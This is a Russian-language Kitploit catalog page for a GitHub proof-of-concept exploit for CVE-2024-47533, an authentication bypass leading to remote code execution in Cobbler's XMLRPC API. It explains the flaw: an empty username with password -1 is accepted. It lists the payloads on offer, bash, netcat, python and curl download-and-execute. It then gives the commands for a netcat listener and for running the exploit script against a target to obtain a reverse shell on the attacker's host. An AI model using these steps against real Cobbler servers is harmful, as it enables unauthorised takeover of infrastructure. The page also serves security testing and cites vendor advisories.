Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC — CVE-2024-47533 — это критическая уязвимость обхода аутентификации в Cobbler (версии с 3.0.0 до 3.2.3 и 3.3.7), позволяющая неаутентифицированное удалённое выполнение кода через интерфейс XMLRPC. | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc
Аутентификация и авторизацияГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubdollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc

CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

CVE-2024-47533 — это критическая уязвимость обхода аутентификации в Cobbler (версии с 3.0.0 до 3.2.3 и 3.3.7), позволяющая неаутентифицированное удалённое выполнение кода через интерфейс XMLRPC.

РепозиторийСайт
8131 год назадЕщё не проверено
Поделиться

CVE-2024-47533 - Эксплойт RCE через обход аутентификации XMLRPC в Cobbler

⚠️ Критическое удалённое выполнение кода через обход аутентификации в Cobbler
🛠️ PoC-реализация от @dollarboysushil


💡 Обзор

Cobbler — сервер установки Linux, который обеспечивает быструю настройку сред сетевой установки, имеет уязвимость аутентификации в версиях с 3.0.0 до (не включая) 3.2.3 и 3.3.7. Функция utils.get_shared_secret() всегда возвращает -1, что позволяет любому подключиться к XML-RPC интерфейсу Cobbler с пустым именем пользователя ('') и паролем -1. Это позволяет атакующему, имеющему сетевой доступ, получить полный контроль над сервером Cobbler. Уязвимость исправлена в версиях 3.2.3 и 3.3.7.


🛠 Технические детали

Уязвимость вызвана некорректной обработкой общего секрета в функции utils.get_shared_secret(), которая всегда возвращает -1, фактически обходя аутентификацию. Это позволяет любому сетевому пользователю подключаться к XMLRPC-интерфейсу Cobbler с пустыми учётными данными и выполнять произвольные команды.


🔥 Уязвимая конечная точка

http://<target>:25151/ — конечная точка XMLRPC API Cobbler


💥 Примеры полезных нагрузок

Скрипт эксплойта поддерживает различные полезные нагрузки reverse shell, включая:

  • Bash reverse shell
  • Netcat shells (nc, nc2)
  • Python reverse shell
  • Curl download & execute

🔬 Демонстрация Proof-of-Concept (PoC)

📡 Подготовка слушателя

Запустите слушатель Netcat на вашей машине:

root@kitploit:~
nc -lvnp 4444

слушатель netcat

🚀 Запуск эксплойта

Запустите скрипт эксплойта CVE-2024-47533-dbs.py.

root@kitploit:~
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

CVE-2024-47533-dbs.py

💻 Успешный доступ к удалённому shell

При успешном выполнении обратный shell подключится к слушателю, предоставляя атакующему удалённый доступ к серверу.

Успешный reverse shell

📝 Ссылки

  • Консультация по безопасности SUSE для CVE-2024-47533
  • Рекомендации по безопасности GitHub GHSA-m26c-fcgh-cp6h
  • База данных уязвимостей Snyk: SNYK-PYTHON-COBBLER-8384360
Скачать инструмент